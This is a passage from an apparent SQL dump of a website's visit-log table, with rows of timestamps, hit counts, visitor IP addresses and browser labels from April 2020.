0,1,0,'66.249.64.23',''),(499170,1587398369,1,1,0,0,'66.249.70.33','chrome'),(499171,1587399359,1,1,0,0,'66.249.64.23','chrome'),(499172,1587399384,1,1,0,0,'157.55.39.206','other'),(499173,1587399708,1,1,0,0,'66.249.64.24','chrome'),(499174,1587400119,1,1,0,0,'66.249.64.25','chrome'),(499175,1587401018,1,0,1,0,'157.55.39.206',''),(499176,1587401304,1,1,0,0,'66.249.64.25','chrome'),(499177,1587402353,1,1,0,0,'157.55.39.198','other'),(499178,1587402695,1,1,0,0,'66.249.64.24','chrome'),(499179,1587403842,1,1,0,0,'157.55.39.198','other'),(499180,1587404426,1,1,0,0,'66.249.64.23','chrome'),(499181,1587404995,3,3,0,0,'66.249.64.24','chrome'),(499182,1587405064,1,1,0,0,'95.133.238.58','chrome'),(499183,1587405070,1,1,0,0,'178.154.200.222','other'),(499184,1587405292,1,1,0,0,'66.249.64.25','chrome'),(499185,1587405491,1,1,0,0,'188.163.76.94','firefox'),(499186,1587405810,8,8,0,0,'77.120.98.235','other'),(499187,1587407708,1,1,0,0,'66.249.64.24','chrome'),(499188,1587407964,1,1,0,0,'66.249.64.25','chrome'),(499189,1587407995,1,1,0,0,'66.249.64.23','chrome'),(499190,1587408177,2,2,0,0,'8.29.198.26','other'),(499191,1587408244,1,1,0,0,'207.46.13.34','other'),(499192,1587408345,21,21,0,0,'185.39.10.73','msie'),(499193,1587408741,1,1,0,0,'176.121.5.162','chrome'),(499194,1587409825,1,1,0,0,'207.46.13.21','other'),(499195,1587409851,1,1,0,0,'176.121.5.162','chrome'),(499196,1587410018,2,2,0,0,'207.46.13.34','other'),(499197,1587411037,1,1,0,0,'66.249.64.23','chrome'),(499198,1587411892,1,1,0,0,'66.249.64.24','chrome'),(499199,1587412714,1,1,0,0,'207.46.13.34','other'),(499200,1587413126,2,2,0,0,'173.249.24.3','other'),(499201,1587413473,1,0,1,0,'207.46.13.21',''),(499202,1587413533,8,8,0,0,'77.120.98.235','other'),(499203,1587413586,1,1,0,0,'66.249.64.25','chrome'),(499204,1587413593,2,2,0,0,'157.55.39.206','other'),(499205,1587414115,1,1,0,0,'66.249.64.23','chrome'),(499206,1587414475,1,1,0,0,'173.252.111.22','other'),(499207,1587414671,1,1,0,0,'66.249.64.25','chrome'),(499208,1587414773,2,2,0,0,'95.213.141.126','opera'),(499209,1587415506,1,1,0,0,'157.55.39.198','other'),(499210,1587416522,1,1,0,0,'66.249.64.23','chrome'),(499211,1587416708,1,1,0,0,'66.249.64.25','chrome'),(499212,1587418066,1,1,0,0,'66.249.64.24','chrome'),(499213,1587418314,1,1,0,0,'157.55.39.206','other'),(499214,1587418951,1,1,0,0,'157.55.39.198','other'),(499215,1587419005,1,1,0,0,'8.29.198.25','other'),(499216,1587419440,1,1,0,0,'8.29.198.27','other'),(499217,1587420238,2,2,0,0,'207.46.13.34','other'),(499218,1587420452,1,1,0,0,'66.249.64.25','chrome'),(499219,1587420546,2,2,0,0,'157.55.39.206','other'),(499220,1587421172,1,1,0,0,'66.249.64.23','chrome'),(499221,1587421385,1,1,0,0,'66.249.70.36','chrome'),(499222,1587421480,8,8,0,0,'77.120.98.235','other'),(499223,1587422691,1,0,1,0,'207.46.13.34',''),(499224,1587422963,1,1,0,0,'66.249.64.25','chrome'),(499225,1587423063,1,1,0,0,'157.55.39.198','other'),(499226,1587424256,2,2,0,0,'207.46.13.34','other'),(499227,1587424545,1,1,0,0,'157.55.39.198','other'),(499228,1587425061,1,1,0,0,'157.55.39.206','other'),(499229,1587425770,1,1,0,0,'207.46.13.21','other'),(499230,1587426907,1,1,0,0,'62.205.134.182','other'),(499231,1587427219,1,1,0,0,'207.46.13.34','other'),(499232,1587428505,1,1,0,0,'66.249.64.25','chrome'),(499233,1587429762,8,8,0,0,'77.120.98.235','other'),(499234,1587429838,1,1,0,0,'8.29.198.25','other'),(499235,1587429979,1,1,0,0,'207.46.13.21','other'),(499236,1587430276,1,1,0,0,'8.29.198.26','other'),(499237,1587430443,1,1,0,0,'66.249.64.24','chrome'),(499238,1587430717,1,1,0,0,'207.46.13.34','other'),(499239,1587432328,1,1,0,0,'66.249.70.38','chrome'),(499240,1587432452,1,1,0,0,'207.46.13.34','other'),(499241,1587432861,1,1,0,0,'31.13.115.15','chrome'),(499242,1587432874,1,1,0,0,'31.13.115.11','chrome'),(499243,1587434150,2,2,0,0,'207.46.13.21','other'),(499244,1587434376,1,1,0,0,'66.249.70.33','chrome'),(499245,1587435329,1,1,0,0,'66.249.64.25','chrome'),(499246,1587435887,1,0,1,0,'66.249.64.23',''),(499247,1587435980,1,1,0,0,'157.55.39.198','other'),(499248,1587436929,2,2,0,0,'207.46.13.21','other'),(499249,1587437179,1,1,0,0,'66.249.64.23','chrome'),(499250,1587438061,1,1,0,0,'207.46.13.21','other'),(499251,1587438132,1,1,0,0,'66.249.64.24','chrome'),(499252,1587438465,8,8,0,0,'77.120.98.235','other'),(499253,1587439364,2,2,0,0,'66.249.64.23','chrome'),(499254,1587440378,1,1,0,0,'178.154.200.97','other'),(499255,1587440513,1,1,0,0,'178.154.200.47','other'),(499256,1587440588,2,2,0,0,'207.46.13.21','other'),(499257,1587440675,1,1,0,0,'8.29.198.27','other'),(499258,1587441104,1,1,0,0,'8.29.198.25','other'),(499259,1587441917,1,1,0,0,'66.249.64.24','chrome'),(499260,1587442420,1,1,0,0,'207.46.13.34','other'),(499261,1587443090,1,1,0,0,'66.249.64.25','chrome'),(499262,1587444189,1,1,0,0,'66.249.64.24','chrome'),(499263,1587444569,1,1,0,0,'62.205.134.182','other'),(499264,1587445074,1,1,0,0,'66.249.64.23','chrome'),(499265,1587445082,2,2,0,0,'207.46.13.21','other'),(499266,1587445738,1,1,0,0,'51.68.152.26','chrome'),(499267,1587446395,8,8,0,0,'77.120.98.235','other'),(499268,1587446433,1,1,0,0,'66.249.70.38','chrome'),(499269,1587446618,1,1,0,0,'66.249.64.25','chrome'),(499270,1587446809,2,2,0,0,'207.46.13.21','other'),(499271,1587447183,2,2,0,0,'66.249.64.24','chrome'),(499272,1587447357,1,1,0,0,'66.249.70.38','chrome'),(499273,1587447420,1,1,0,0,'157.55.39.198','other'),(499274,1587450391,1,1,0,0,'213.180.203.190','other'),(499275,1587450562,1,1,0,0,'207.46.13.21','other'),(499276,1587451226,2,2,0,0,'157.55.39.198','other'),(499277,1587451501,1,1,0,0,'8.29.198.25','other'),(499278,1587451578,1,1,0,0,'91.196.178.189','firefox'),(499279,1587451932,1,1,0,0,'8.29.198.26','other'),(499280,1587452273,1,1,0,0,'157.55.39.198','other'),(499281,1587452832,1,1,0,0,'95.47.248.22','chrome'),(499282,1587452966,1,1,0,0,'66.249.64.23','chrome'),(499283,1587453938,1,1,0,0,'93.124.40.43','chrome'),(499284,1587454021,1,1,0,0,'157.55.39.206','other'),(499285,1587454146,2,2,0,0,'66.249.64.23','chrome'),(499286,1587454408,1,1,0,0,'91.196.178.79','firefox'),(499287,1587454522,1,1,0,0,'66.249.64.25','chrome'),(499288,1587454596,1,1,0,0,'66.249.64.24','chrome'),(499289,1587454904,8,8,0,0,'77.120.98.235','other'),(499290,1587454998,1,1,0,0,'91.196.178.129','firefox'),(499291,1587455319,1,1,0,0,'157.55.39.198','other'),(499292,1587455604,2,2,0,0,'207.46.13.21','other'),(499293,1587456269,1,1,0,0,'207.46.13.34','other'),(499294,1587456273,2,2,0,0,'66.249.70.36','chrome'),(499295,1587456275,1,1,0,0,'157.55.39.198','other'),(499296,1587456279,2,2,0,0,'157.55.39.206','other'),(499297,1587456577,2,2,0,0,'66.249.64.25','chrome'),(499298,1587456681,1,1,0,0,'46.249.74.193','other'),(499299,1587457132,1,1,0,0,'212.5.158.211','chrome'),(499300,1587457191,1,1,0,0,'66.249.64.23','chrome'),(499301,1587457345,1,1,0,0,'37.228.117.196','other'),(499302,1587458063,1,1,0,0,'207.46.13.136','other'),(499303,1587458675,1,1,0,0,'173.252.111.17','other'),(499304,1587458912,1,1,0,0,'66.249.64.24','chrome'),(499305,1587459015,1,1,0,0,'207.46.13.136','other'),(499306,1587459228,1,1,0,0,'66.249.64.25','chrome'),(499307,1587459433,1,1,0,0,'157.55.39.206','other'),(499308,1587459760,1,1,0,0,'66.249.64.23','chrome'),(499309,1587459943,1,1,0,0,'66.249.64.24','chrome'),(499310,1587460735,1,1,0,0,'38.99.62.94','other'),(499311,1587460849,1,1,0,0,'66.249.70.36','chrome'),(499312,1587461629,2,2,0,0,'207.46.13.34','other'),(499313,1587461639,1,1,0,0,'93.73.160.193','firefox'),(499314,1587461714,1,1,0,0,'66.249.70.33','chrome'),(499315,1587461970,1,1,0,0,'194.246.74.39','chrome'),(499316,1587462249,2,2,0,0,'66.249.64.24','chrome'),(499317,1587462335,1,1,0,0,'8.29.198.26','other'),(499318,1587462494,1,1,0,0,'157.55.39.206','other'),(499319,1587462504,2,2,0,0,'66.249.64.23','chrome'),(499320,1587462553,1,1,0,0,'207.46.13.136','other'),(499321,1587462653,1,1,0,0,'157.55.39.198','other'),(499322,1587462759,1,1,0,0,'8.29.198.25','other'),(499323,1587463059,1,1,0,0,'173.252.111.17','other'),(499324,1587463060,1,1,0,0,'173.252.111.10','other'),(499325,1587463069,1,1,0,0,'173.252.111.9','other'),(499326,1587463070,1,1,0,0,'91.196.178.186','chrome'),(499327,1587463164,1,1,0,0,'207.46.13.34','other'),(499328,1587463383,1,1,0,0,'66.249.64.25','chrome'),(499329,1587463708,8,8,0,0,'77.120.98.235','other'),(499330,1587464388,2,2,0,0,'207.46.13.34','other'),(499331,1587464792,1,1,0,0,'66.249.70.36','chrome'),(499332,1587464853,1,1,0,0,'3.226.72.201','chrome'),(499333,1587465206,1,1,0,0,'157.55.39.198','other'),(499334,1587465285,1,1,0,0,'66.249.64.25','chrome'),(499335,1587465730,1,1,0,0,'66.249.64.23','chrome'),(499336,1587466058,1,1,0,0,'91.229.243.22','chrome'),(499337,1587466504,1,1,0,0,'109.74.154.72','chrome'),(499338,1587467914,1,1,0,0,'31.43.16.107','chrome'),(499339,1587468023,1,1,0,0,'207.46.13.136','other'),(499340,1587468477,1,1,0,0,'66.249.70.38','chrome'),(499341,1587469522,1,1,0,0,'157.55.39.212','other'),(499342,1587470254,1,1,0,0,'213.180.203.16','other'),(499343,1587470268,2,2,0,0,'91.124.83.93','chrome'),(499344,1587470300,1,1,0,0,'157.55.39.206','other'),(499345,1587470536,3,3,0,0,'66.249.64.25','chrome'),(499346,1587470980,1,1,0,0,'91.196.178.16','chrome'),(499347,1587471508,1,1,0,0,'131.220.6.152','chrome'),(499348,1587471932,8,8,0,0,'77.120.98.235','other'),(499349,1587472095,1,1,0,0,'207.46.13.34','other'),(499350,1587472182,1,1,0,0,'66.249.70.33','chrome'),(499351,1587472856,3,3,0,0,'157.55.39.212','other'),(499352,1587473164,1,1,0,0,'8.29.198.26','other'),(499353,1587473591,1,1,0,0,'8.29.198.25','other'),(499354,1587473612,1,1,0,0,'66.249.64.24','chrome'),(499355,1587473648,1,1,0,0,'207.46.13.34','other'),(499356,1587473663,1,1,0,0,'92.112.125.101','chrome'),(499357,1587474617,1,1,0,0,'157.55.39.212','other'),(499358,1587474881,1,1,0,0,'66.249.64.25','chrome'),(499359,1587475293,2,2,0,0,'66.249.70.36','chrome'),(499360,1587475727,1,1,0,0,'207.46.13.136','other'),(499361,1587475845,12,12,0,0,'134.122.54.200','chrome'),(499362,1587476016,1,1,0,0,'213.180.203.29','other'),(499363,1587476035,2,2,0,0,'178.154.200.222','other'),(499364,1587476421,1,1,0,0,'173.252.111.19','other'),(499365,1587476422,1,1,0,0,'173.252.111.20','other'),(499366,1587476592,1,1,0,0,'66.249.64.24','chrome'),(499367,1587476716,1,1,0,0,'66.249.64.23','chrome'),(499368,1587476825,1,1,0,0,'66.249.70.38','chrome'),(499369,1587477493,1,1,0,0,'91.209.11.236','other'),(499370,1587478053,1,1,0,0,'157.55.39.212','other'),(499371,1587478411,1,1,0,0,'207.46.13.136','other'),(499372,1587478458,1,1,0,0,'178.154.200.222','other'),(499373,1587478478,2,2,0,0,'66.249.64.23','chrome'),(499374,1587480116,1,1,0,0,'207.46.13.136','other'),(499375,1587480363,1,1,0,0,'107.21.1.8','other'),(499376,1587480366,1,1,0,0,'54.208.102.37','other'),(499377,1587480682,8,8,0,0,'77.120.98.235','other'),(499378,1587481180,1,1,0,0,'176.102.50.28','firefox'),(499379,1587481370,1,1,0,0,'66.249.64.25','chrome'),(499380,1587481437,1,1,0,0,'178.154.200.222','other'),(499381,1587481465,1,1,0,0,'77.74.177.114','chrome'),(499382,1587481502,1,1,0,0,'66.249.64.24','chrome'),(499383,1587482958,2,2,0,0,'213.180.203.16','other'),(499384,1587483030,1,0,1,0,'157.55.39.212',''),(499385,1587483455,1,1,0,0,'172.69.34.29','other'),(499386,1587483694,2,2,0,0,'207.46.13.136','other'),(499387,1587483993,1,1,0,0,'8.29.198.27','other'),(499388,1587484072,1,1,0,0,'157.55.39.212','other'),(499389,1587484415,1,1,0,0,'8.29.198.25','other'),(499390,1587484663,1,1,0,0,'178.154.200.222','other'),(499391,1587484988,1,1,0,0,'66.249.64.25','chrome'),(499392,1587486134,1,0,1,0,'66.249.64.23',''),(499393,1587487005,1,1,0,0,'207.46.13.136','other'),(499394,1587487744,4,4,0,0,'178.154.200.222','other'),(499395,1587487805,2,2,0,0,'66.249.64.24','chrome'),(499396,1587488312,1,1,0,0,'157.55.39.206','other'),(499397,1587488567,2,2,0,0,'207.46.13.34','other'),(499398,1587489028,2,1,1,0,'207.46.13.136',''),(499399,1587489065,8,8,0,0,'77.120.98.235','other'),(499400,1587489180,1,1,0,0,'91.203.164.158','firefox'),(499401,1587489601,1,1,0,0,'37.30.48.227','firefox'),(499402,1587489944,1,1,0,0,'66.249.64.25','chrome'),(499403,1587490819,2,2,0,0,'213.180.203.16','other'),(499404,1587490930,1,1,0,0,'66.249.64.11','chrome'),(499405,1587491034,1,1,0,0,'207.46.13.34','other'),(499406,1587491115,1,1,0,0,'207.46.13.136','other'),(499407,1587491215,1,1,0,0,'157.55.39.212','other'),(499408,1587491223,1,1,0,0,'37.73.148.215','chrome'),(499409,1587491332,1,1,0,0,'178.154.200.222','other'),(499410,1587491485,1,1,0,0,'66.249.64.69','chrome'),(499411,1587492026,1,1,0,0,'66.249.64.70','chrome'),(499412,1587492282,2,2,0,0,'66.249.64.23','chrome'),(499413,1587492325,1,1,0,0,'66.249.70.38','chrome'),(499414,1587493692,1,1,0,0,'66.249.64.24','chrome'),(499415,1587494714,1,1,0,0,'207.46.13.136','other'),(499416,1587494825,1,1,0,0,'8.29.198.25','other'),(499417,1587495113,1,1,0,0,'178.154.200.222','other'),(499418,1587495251,1,1,0,0,'8.29.198.26','other'),(499419,1587495434,1,1,0,0,'157.55.39.212','other'),(499420,1587495852,1,1,0,0,'207.46.13.34','other'),(499421,1587496341,2,1,1,0,'157.55.39.212',''),(499422,1587496342,1,1,0,0,'178.154.200.222','other'),(499423,1587497151,8,8,0,0,'77.120.98.235','other'),(499424,1587497251,2,2,0,0,'207.46.13.136','other'),(499425,1587497349,1,1,0,0,'178.154.200.222','other'),(499426,1587497441,1,1,0,0,'157.55.39.206','other'),(499427,1587497451,1,1,0,0,'31.13.103.18','other'),(499428,1587497523,1,1,0,0,'66.249.64.24','chrome'),(499429,1587498006,2,2,0,0,'66.249.64.23','chrome'),(499430,1587499335,1,1,0,0,'66.249.64.25','chrome'),(499431,1587499360,1,1,0,0,'66.249.70.36','chrome'),(499432,1587499385,1,1,0,0,'66.249.64.24','chrome'),(499433,1587499443,1,1,0,0,'213.180.203.95','other'),(499434,1587499666,1,1,0,0,'178.154.200.97','other'),(499435,1587499844,1,1,0,0,'66.249.64.23','chrome'),(499436,1587500197,1,1,0,0,'198.50.246.236','other'),(499437,1587500372,2,2,0,0,'66.249.64.24','chrome'),(499438,1587500386,1,1,0,0,'81.88.148.211','chrome'),(499439,1587502025,1,1,0,0,'66.249.70.38','chrome'),(499440,1587502383,1,1,0,0,'207.46.13.136','other'),(499441,1587502486,3,3,0,0,'178.154.200.222','other'),(499442,1587503895,1,1,0,0,'207.46.13.34','other'),(499443,1587504047,1,1,0,0,'213.180.203.16','other'),(499444,1587504058,1,1,0,0,'178.154.200.222','other'),(499445,1587504417,1,1,0,0,'209.17.97.114','other'),(499446,1587504891,1,1,0,0,'157.55.39.212','other'),(499447,1587505261,1,1,0,0,'209.17.96.10','other'),(499448,1587505275,8,8,0,0,'77.120.98.235','other'),(499449,1587505316,1,1,0,0,'207.46.13.136','other'),(499450,1587505652,2,2,0,0,'8.29.198.26','other'),(499451,1587506140,1,1,0,0,'157.55.39.206','other'),(499452,1587506288,1,1,0,0,'207.46.13.34','other'),(499453,1587506322,1,1,0,0,'91.196.178.151','chrome'),(499454,1587506674,1,1,0,0,'178.154.200.222','other'),(499455,1587506981,1,1,0,0,'157.55.39.212','other'),(499456,1587507020,1,1,0,0,'207.46.13.136','other'),(499457,1587508414,1,1,0,0,'207.46.13.136','other'),(499458,1587509129,2,2,0,0,'66.249.64.24','chrome'),(499459,1587509194,1,1,0,0,'207.46.13.34','other'),(499460,1587509819,1,1,0,0,'213.180.203.140','other'),(499461,1587510468,1,1,0,0,'157.55.39.206','other'),(499462,1587510903,1,1,0,0,'66.249.70.36','chrome'),(499463,1587511533,1,1,0,0,'213.180.203.16','other'),(499464,1587511611,1,1,0,0,'207.46.13.136','other'),(499465,1587512675,1,1,0,0,'66.249.64.23','chrome'),(499466,1587512944,1,1,0,0,'66.249.64.25','chrome'),(499467,1587513068,2,2,0,0,'66.249.64.24','chrome'),(499468,1587513168,8,8,0,0,'77.120.98.235','other'),(499469,1587513307,1,1,0,0,'62.205.134.182','other'),(499470,1587513561,2,2,0,0,'157.55.39.206','other'),(499471,1587514383,1,0,1,0,'66.249.64.24',''),(499472,1587514732,1,1,0,0,'178.154.200.87','other'),(499473,1587514822,1,1,0,0,'66.249.64.24','chrome'),(499474,1587514978,1,1,0,0,'213.180.203.38','other'),(499475,1587515583,1,1,0,0,'104.248.88.100','firefox'),(499476,1587515659,1,1,0,0,'66.249.70.36','chrome'),(499477,1587516104,1,1,0,0,'207.46.13.34','other'),(499478,1587516449,2,1,1,0,'157.55.39.206',''),(499479,1587516482,1,1,0,0,'8.29.198.25','other'),(499480,1587516527,2,2,0,0,'66.249.64.23','chrome'),(499481,1587516699,1,1,0,0,'178.140.52.201','firefox'),(499482,1587516799,1,1,0,0,'213.180.203.119','other'),(499483,1587516903,1,1,0,0,'8.29.198.26','other'),(499484,1587517156,1,1,0,0,'207.46.13.136','other'),(499485,1587517392,1,1,0,0,'157.55.39.206','other'),(499486,1587517547,1,1,0,0,'178.154.200.17','other'),(499487,1587518076,1,1,0,0,'66.249.64.24','chrome'),(499488,1587518089,1,1,0,0,'213.180.203.119','other'),(499489,1587518753,1,1,0,0,'66.249.64.25','chrome'),(499490,1587519182,1,1,0,0,'178.154.200.17','other'),(499491,1587519488,1,1,0,0,'213.180.203.190','other'),(499492,1587519842,1,1,0,0,'207.46.13.34','other'),(499493,1587520079,1,1,0,0,'207.46.13.136','other'),(499494,1587520997,8,8,0,0,'77.120.98.235','other'),(499495,1587521015,1,1,0,0,'213.180.203.109','other'),(499496,1587521070,2,2,0,0,'207.46.13.136','other'),(499497,1587521712,1,1,0,0,'66.249.64.24','chrome'),(499498,1587521941,1,1,0,0,'207.46.13.34','other'),(499499,1587522038,2,2,0,0,'66.249.64.23','chrome'),(499500,1587522051,2,2,0,0,'66.249.70.38','chrome'),(499501,1587522242,1,1,0,0,'2.47.39.221','other'),(499502,1587522367,1,1,0,0,'213.180.203.50','other'),(499503,1587522664,1,1,0,0,'207.46.13.136','other'),(499504,1587523246,1,1,0,0,'213.180.203.119','other'),(499505,1587524308,1,1,0,0,'178.154.200.87','other'),(499506,1587524700,1,1,0,0,'213.180.203.122','other'),(499507,1587524716,1,1,0,0,'178.159.37.88','chrome'),(499508,1587525319,1,1,0,0,'66.249.64.25','chrome'),(499509,1587525874,1,1,0,0,'207.46.13.34','other'),(499510,1587526183,2,2,0,0,'66.249.64.23','chrome'),(499511,1587526262,1,1,0,0,'207.46.13.242','other'),(499512,1587526381,2,2,0,0,'213.180.203.148','other'),(499513,1587526999,1,1,0,0,'178.154.200.234','other'),(499514,1587527074,1,0,1,0,'66.249.64.24',''),(499515,1587527130,1,1,0,0,'66.249.64.23','chrome'),(499516,1587527315,1,1,0,0,'8.29.198.27','other'),(499517,1587527349,1,1,0,0,'66.249.64.24','chrome'),(499518,1587527731,1,1,0,0,'8.29.198.26','other'),(499519,1587527973,1,1,0,0,'178.154.200.222','other'),(499520,1587528801,2,2,0,0,'66.249.64.24','chrome'),(499521,1587528805,1,1,0,0,'91.196.178.178','chrome'),(499522,1587529175,8,8,0,0,'77.120.98.235','other'),(499523,1587529287,1,1,0,0,'66.249.64.23','chrome'),(499524,1587529393,2,2,0,0,'66.249.64.25','chrome'),(499525,1587529807,1,1,0,0,'66.249.64.24','chrome'),(499526,1587530319,1,1,0,0,'178.154.200.196','other'),(499527,1587530675,1,1,0,0,'62.205.134.182','other'),(499528,1587530692,2,2,0,0,'157.55.39.206','other'),(499529,1587531066,1,1,0,0,'93.124.40.43','chrome'),(499530,1587531118,2,2,0,0,'178.154.200.222','other'),(499531,1587531243,1,1,0,0,'66.249.64.24','chrome'),(499532,1587531531,1,1,0,0,'66.249.64.25','chrome'),(499533,1587532136,1,1,0,0,'157.55.39.212','other'),(499534,1587532137,1,0,1,0,'207.46.13.242',''),(499535,1587532187,1,1,0,0,'207.46.13.242','other'),(499536,1587532260,1,1,0,0,'213.180.203.16','other'),(499537,1587532553,4,4,0,0,'66.249.64.24','chrome'),(499538,1587532584,2,2,0,0,'66.249.64.23','chrome'),(499539,1587533225,1,1,0,0,'157.55.39.206','other'),(499540,1587533983,2,2,0,0,'66.249.64.25','chrome'),(499541,1587534130,2,2,0,0,'178.154.200.222','other'),(499542,1587534403,1,1,0,0,'66.249.70.38','chrome'),(499543,1587534622,1,1,0,0,'66.249.64.24','chrome'),(499544,1587534992,1,1,0,0,'66.249.64.25','chrome'),(499545,1587535018,2,2,0,0,'207.46.13.242','other'),(499546,1587535099,1,1,0,0,'66.249.70.33','chrome'),(499547,1587535431,1,1,0,0,'66.249.70.38','chrome'),(499548,1587535877,1,1,0,0,'213.180.203.16','other'),(499549,1587536133,1,1,0,0,'66.249.64.24','chrome'),(499550,1587537140,8,8,0,0,'77.120.98.235','other'),(499551,1587538146,1,1,0,0,'8.29.198.26','other'),(499552,1587538311,1,1,0,0,'207.46.13.242','other'),(499553,1587538359,1,1,0,0,'66.249.64.23','chrome'),(499554,1587538559,1,1,0,0,'8.29.198.25','other'),(499555,1587538704,1,1,0,0,'66.249.64.24','chrome'),(499556,1587538828,1,1,0,0,'157.55.39.206','other'),(499557,1587539894,1,1,0,0,'92.38.136.69','chrome'),(499558,1587540322,1,1,0,0,'66.249.64.24','chrome'),(499559,1587540356,3,3,0,0,'157.55.39.212','other'),(499560,1587540361,2,2,0,0,'207.46.13.242','other'),(499561,1587540948,2,2,0,0,'66.249.64.25','chrome'),(499562,1587541058,1,1,0,0,'173.252.79.22','other'),(499563,1587541605,1,1,0,0,'157.55.39.212','other'),(499564,1587541787,1,1,0,0,'178.154.200.222','other'),(499565,1587541983,1,1,0,0,'91.196.178.90','firefox'),(499566,1587543185,1,0,1,0,'66.249.64.23',''),(499567,1587543786,1,1,0,0,'178.95.159.205','chrome'),(499568,1587543995,1,1,0,0,'66.249.64.23','chrome'),(499569,1587545114,1,1,0,0,'66.249.64.23','chrome'),(499570,1587545262,1,1,0,0,'66.249.70.38','chrome'),(499571,1587545853,1,1,0,0,'213.180.203.119','other'),(499572,1587546070,8,8,0,0,'77.120.98.235','other'),(499573,1587546153,1,1,0,0,'111.30.33.149','chrome'),(499574,1587546708,1,1,0,0,'213.180.203.190','other'),(499575,1587546973,1,1,0,0,'178.154.200.19','other'),(499576,1587547050,1,1,0,0,'91.196.178.162','chrome'),(499577,1587547190,1,1,0,0,'195.10.210.70','chrome'),(499578,1587547216,1,1,0,0,'66.249.64.24','chrome'),(499579,1587547382,1,1,0,0,'66.249.64.25','chrome'),(499580,1587548056,1,1,0,0,'145.239.209.12','chrome'),(499581,1587548132,1,1,0,0,'91.196.178.90','firefox'),(499582,1587548852,1,1,0,0,'3.21.113.131','chrome'),(499583,1587548917,1,1,0,0,'66.220.149.20','other'),(499584,1587548975,1,1,0,0,'8.29.198.25','other'),(499585,1587548983,1,1,0,0,'157.55.39.206','other'),(499586,1587549291,1,1,0,0,'157.55.39.212','other'),(499587,1587549380,1,1,0,0,'8.29.198.27','other'),(499588,1587549425,1,1,0,0,'66.249.64.24','chrome'),(499589,1587549487,1,1,0,0,'91.196.178.90','firefox'),(499590,1587549664,1,1,0,0,'178.154.200.222','other'),(499591,1587550154,2,2,0,0,'95.216.247.251','other'),(499592,1587550319,1,1,0,0,'35.246.54.148','firefox'),(499593,1587550585,1,1,0,0,'88.155.124.135','chrome'),(499594,1587551078,1,1,0,0,'178.154.200.222','other'),(499595,1587551506,1,1,0,0,'66.249.64.23','chrome'),(499596,1587551704,1,1,0,0,'157.55.39.212','other'),(499597,1587552131,1,1,0,0,'207.46.13.34','other'),(499598,1587552262,1,1,0,0,'66.249.70.33','chrome'),(499599,1587552879,2,2,0,0,'66.249.64.25','chrome'),(499600,1587553515,1,1,0,0,'66.249.64.23','chrome'),(499601,1587553617,2,2,0,0,'95.213.141.126','opera'),(499602,1587553846,1,1,0,0,'109.74.154.72','chrome'),(499603,1587554461,1,1,0,0,'66.249.64.25','chrome'),(499604,1587554795,8,8,0,0,'77.120.98.235','other'),(499605,1587555885,1,1,0,0,'66.249.64.25','chrome'),(499606,1587555937,1,1,0,0,'207.46.13.242','other'),(499607,1587556690,1,1,0,0,'66.249.70.38','chrome'),(499608,1587557056,1,1,0,0,'207.46.13.242','other'),(499609,1587557061,2,2,0,0,'157.55.39.212','other'),(499610,1587557068,1,1,0,0,'157.55.39.206','other'),(499611,1587557091,1,1,0,0,'207.46.13.34','other'),(499612,1587557868,1,1,0,0,'131.220.6.152','chrome'),(499613,1587557870,1,1,0,0,'195.10.210.70','chrome'),(499614,1587558269,1,1,0,0,'91.196.178.169','chrome'),(499615,1587558353,1,1,0,0,'207.46.13.34','other'),(499616,1587558417,1,1,0,0,'91.196.178.16','chrome'),(499617,1587558467,1,1,0,0,'66.249.64.25','chrome'),(499618,1587558483,1,1,0,0,'91.196.178.92','firefox'),(499619,1587559087,1,0,1,0,'157.55.39.206',''),(499620,1587559114,2,2,0,0,'157.55.39.206','other'),(499621,1587559809,2,2,0,0,'8.29.198.25','other'),(499622,1587560211,1,1,0,0,'157.55.39.212','other'),(499623,1587560275,1,1,0,0,'66.249.81.196','chrome'),(499624,1587560745,1,1,0,0,'66.249.70.33','chrome'),(499625,1587560755,1,1,0,0,'66.249.64.25','chrome'),(499626,1587560873,1,1,0,0,'66.249.64.23','chrome'),(499627,1587560944,1,1,0,0,'66.249.64.24','chrome'),(499628,1587562150,2,2,0,0,'66.249.64.23','chrome'),(499629,1587562763,1,1,0,0,'157.55.39.212','other'),(499630,1587562829,1,0,1,0,'66.249.64.24',''),(499631,1587562950,1,1,0,0,'207.46.13.34','other'),(499632,1587563464,1,1,0,0,'157.55.39.206','other'),(499633,1587563512,1,1,0,0,'207.46.13.242','other'),(499634,1587563880,1,1,0,0,'157.55.39.212','other'),(499635,1587563946,2,2,0,0,'207.46.13.34','other'),(499636,1587564545,8,8,0,0,'77.120.98.235','other'),(499637,1587566097,1,1,0,0,'66.249.64.24','chrome'),(499638,1587566148,1,1,0,0,'207.46.13.242','other'),(499639,1587566400,1,1,0,0,'46.219.206.14','firefox'),(499640,1587566616,1,1,0,0,'66.249.64.23','chrome'),(499641,1587566878,1,1,0,0,'213.180.203.16','other'),(499642,1587566907,2,2,0,0,'207.46.13.34','other'),(499643,1587567077,2,2,0,0,'178.154.200.222','other'),(499644,1587567224,1,1,0,0,'46.211.64.10','chrome'),(499645,1587567260,1,1,0,0,'207.46.13.242','other'),(499646,1587568105,1,1,0,0,'149.129.92.224','firefox'),(499647,1587568527,1,1,0,0,'213.180.203.16','other'),(499648,1587568553,1,1,0,0,'66.249.70.38','chrome'),(499649,1587568596,4,4,0,0,'178.154.200.222','other'),(499650,1587569073,2,2,0,0,'66.249.64.24','chrome'),(499651,1587569292,2,2,0,0,'66.249.64.25','chrome'),(499652,1587569300,2,2,0,0,'66.249.64.23','chrome'),(499653,1587569540,1,1,0,0,'162.213.36.182','chrome'),(499654,1587569681,1,1,0,0,'157.55.39.212','other'),(499655,1587569836,1,1,0,0,'207.46.13.34','other'),(499656,1587570272,1,1,0,0,'178.154.200.222','other'),(499657,1587570379,1,1,0,0,'157.55.39.206','other'),(499658,1587570445,1,1,0,0,'66.249.64.23','chrome'),(499659,1587570639,1,1,0,0,'8.29.198.27','other'),(499660,1587570749,2,2,0,0,'66.249.64.24','chrome'),(499661,1587570979,1,1,0,0,'185.11.31.91','chrome'),(499662,1587571022,1,1,0,0,'8.29.198.25','other'),(499663,1587571078,1,1,0,0,'178.154.200.220','other'),(499664,1587571211,1,1,0,0,'66.249.70.38','chrome'),(499665,1587571633,1,1,0,0,'66.249.64.23','chrome'),(499666,1587571908,1,1,0,0,'66.249.64.25','chrome'),(499667,1587571968,1,1,0,0,'91.124.183.233','chrome'),(499668,1587572128,1,1,0,0,'213.180.203.17','other'),(499669,1587572136,1,1,0,0,'195.114.146.186','chrome'),(499670,1587573252,1,1,0,0,'207.46.13.34','other'),(499671,1587573445,2,2,0,0,'178.154.200.220','other'),(4996